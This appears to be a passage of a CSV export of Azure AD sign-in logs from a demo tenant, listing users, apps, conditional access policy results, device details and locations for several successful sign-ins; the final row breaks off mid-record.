+534,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:48.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d1395072-8972-42fb-9171-d62afcde1a82,Microsoft.aadiam,Microsoft.aadiam,,Ely Abramovitch,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:08,"{'operatingSystem': 'Windows 10', 'deviceId': 'c44a422d-5560-4c92-92f8-d48eac67534b', 'browser': 'Chrome 80.0.3987', 'displayName': 'ELABRAMO-LAP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c5b94689-796f-4b24-973f-d9d3c9bc5c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.2205696105957, 'latitude': 32.77729034423828}, 'state': 'Hazafon', 'city': 'Bir Al-Maksur'}",none,none,none,none,[],{'errorCode': 0},Ely Abramovitch,43177305-d1dc-4a24-b3a7-81bac53bed4a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c5b94689-796f-4b24-973f-d9d3c9bc5c00,SigninLogs,Sucess,32.77729034,35.22056961
+535,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:17.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3053b4e4-7c59-43fb-a3f5-9a8f5f02e1f9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6f905d6a-b8b5-48fe-8361-59d7c6401a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d7c6401a00,SigninLogs,Sucess,33.7984581,-84.38828278
+536,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:13.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ea5d4783-75eb-4b4e-ac2d-cefa1ef54469,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e4ad56a4-20cd-4ec9-8d5b-ecb83cf91900,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,e4ad56a4-20cd-4ec9-8d5b-ecb83cf91900,SigninLogs,Sucess,50.6406517,5.572050095
+537,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:31.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,095b8904-c467-4a92-b68c-54d9edfa65cf,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8a945db4-b61d-4e46-b881-75d8b7a52000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d8b7a52000,SigninLogs,Sucess,36.6404686,-78.26995087
+538,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",8dc4045a-0a92-47cb-a144-866ef1d50200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8dc4045a-0a92-47cb-a144-866ef1d50200,SigninLogs,Sucess,35.01296997,-80.93171692
+539,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:36.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29abca64-1454-4194-b893-834e4922701a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f22e123a-cab3-4cb1-81e0-9a3b33012200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f22e123a-cab3-4cb1-81e0-9a3b33012200,SigninLogs,Sucess,36.6404686,-78.26995087
+540,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:29.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,71d9f28a-81db-45b6-9468-95c0930032d9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",dc80472e-764b-416b-817a-5ef0a3d81d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,dc80472e-764b-416b-817a-5ef0a3d81d00,SigninLogs,Sucess,36.6404686,-78.26995087
+541,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:11.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,83cec801-ebaf-4cab-b6bf-45417b3a2322,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 